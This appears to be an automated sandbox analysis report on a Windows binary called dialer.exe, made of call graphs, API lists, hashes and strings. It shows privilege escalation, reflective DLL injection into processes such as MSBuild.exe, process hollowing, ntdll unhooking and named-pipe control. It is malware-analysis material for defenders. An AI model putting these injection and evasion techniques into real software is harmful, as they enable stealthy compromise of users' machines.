                                                  execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                  Callgraph

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                  • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                  • API String ID: 4177739653-1130149537
                                                  • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                  • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                  • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                  • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                  • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                  • API String ID: 2561231171-3753927220
                                                  • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                  • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                  • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                  • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                  • String ID:
                                                  • API String ID: 4084875642-0
                                                  • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                  • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                  • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                  • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                  • String ID:
                                                  • API String ID: 3197395349-0
                                                  • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                  • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                  • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                  • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                  • String ID: .text$C:\Windows\System32\
                                                  • API String ID: 2721474350-832442975
                                                  • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                  • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                  • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                  • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                  • String ID: M$\\.\pipe\dialerchildproc64
                                                  • API String ID: 2203880229-3489460547
                                                  • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                  • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                  • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                  • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                  • String ID: \\.\pipe\dialercontrol_redirect64
                                                  • API String ID: 2071455217-3440882674
                                                  • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                  • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                  • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                  • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                  • String ID:
                                                  • API String ID: 3676546796-0
                                                  • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                  • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                  • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                  • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                  Control-flow Graph

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                  • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                    • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                    • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                    • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                    • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                    • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                    • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                    • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                    • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                    • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                    • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                    • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                    • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                    • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                  • OpenProcess.KERNEL32 ref: 0000000140001859
                                                  • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                  • CloseHandle.KERNEL32 ref: 0000000140001875
                                                  • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                  • String ID:
                                                  • API String ID: 1323846700-0
                                                  • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                  • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                  • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                  • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenWow64
                                                  • String ID:
                                                  • API String ID: 10462204-0
                                                  • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                  • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                  • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                  • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                  APIs
                                                    • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                    • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                    • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                    • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                    • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                    • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                    • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                    • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                    • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                    • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                    • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                    • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                    • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
